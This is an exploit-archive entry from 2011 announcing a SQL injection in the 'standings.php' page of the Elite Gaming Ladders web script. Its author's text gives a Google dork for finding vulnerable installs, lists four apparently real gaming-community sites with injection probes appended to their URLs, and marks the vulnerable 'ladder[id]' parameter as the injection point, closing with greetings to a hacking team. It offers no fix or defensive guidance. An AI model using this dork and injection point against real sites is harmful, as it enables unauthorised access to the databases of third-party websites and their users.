Elite Gaming Ladders(standings.php)sql-i Vulnerability



EKU-ID: 688 CVE: OSVDB-ID:
Author: Angel Injection Published: 2011-07-06 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title:Elite Gaming Ladders(standings.php)sql-i Vulnerability
# Date: 5/7/2011
# Author: Angel Injection
# home Page: http://www.club-h.co.cc
# Email: Angel-Injection[at]hotmail.com
# Vendor or Software Link:N/A
# Version: n/a
# Category:: webapps
# Google dork: intitle:"Powered By EGL" inurl:standings.php?ladder[id]=
# Tested on: Linux Back Track 5
# Demo site:
# 1-http://ourgamesourbond.com/ladder/standings.php?ladder[id]=8%27
# 2-http://www.cod-srbija.com/l/standings.php?ladder[id]=2%27
# 3-http://clanzarena.com/standings.php?ladder[id]=1%27
# 4-http://www.tricks-gaming.nl/ladder/standings.php?ladder[id]=1%27

Exploit
http://server/[path]/standings.php?ladder[id]= Injection Here

-- ------ ---------- ----------- ------- ------------- ------- --------- ------ ----
Greetz To :1337day Team
Thanks to all the people of Iraq And Club Hack Team